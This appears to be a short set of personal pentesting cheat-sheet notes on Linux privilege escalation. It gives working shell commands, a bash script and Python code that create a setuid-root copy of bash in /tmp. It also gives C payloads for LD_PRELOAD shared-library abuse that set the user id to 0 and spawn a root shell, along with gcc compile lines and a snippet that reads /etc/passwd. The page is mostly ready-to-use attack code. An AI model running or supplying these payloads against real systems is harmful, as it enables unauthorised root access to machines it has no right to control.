Root Bash
A root bash is a (bash) shell that was executed as root. For instance, using an attack vector such as a SUID script, we may run:
$ cp /bin/bash /tmp/rootbash
$ chown root /tmp/rootbash
$ chmod +s /tmp/rootbash
If you are successful, you can use -p
(and -i
) to run it:
$ /tmp/rootbash -p
root@xxx$
π Replace root
with another user according to the attack vector.
Root Bash (script)
Remember to make it executable using chmod +x root.sh
.
#!/usr/bin/env /bin/bash
cp /bin/bash /tmp/rootbash
chown root /tmp/rootbash
chmod +s /tmp/rootbash
Root Bash (Python)
The values 0,0
are the UID/GID. 0o4755
means 755
with SUID.
import shutil
import os
source_path = '/bin/bash'
destination_path = '/tmp/rootbash'
shutil.copy2(source_path, destination_path)
os.chown(destination_path, 0, 0)
os.chmod(destination_path, 0o4755)
Root Bash Static Library
Short simplified program.
void _init() {
setgid(0);
setuid(0);
system("/bin/bash");
}
Long program.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
To compile, use:
$ gcc -shared -fPIC init.c -o init.so
Or, if you are compiling the function _init
:
$ gcc -shared -fPIC init.c -o init.so -nostartfiles
β οΈ Remember to ensure that the file is readable by those that need it.
$ chmod 777 init.so # π - avoid it
Read a file in C
FILE *file = fopen("/etc/passwd", "r");
if (file == NULL) {
printf("Error opening the file.\n");
return;
}
char buffer[256];
while (fgets(buffer, sizeof(buffer), file) != NULL) {
printf("%s", buffer);
}
fclose(file);
π» To-do π»
Stuff that I found, but never read/used yet.
// gcc -shared -fPIC shell.c -o shell.so
#include<stdio.h>
#include<stdlib.h>
void __attribute__((constructor)) shell();
void main() {};
void shell() {
system("id");
}
__attribute__ ((__constructor__)) void shell() {
// ...
}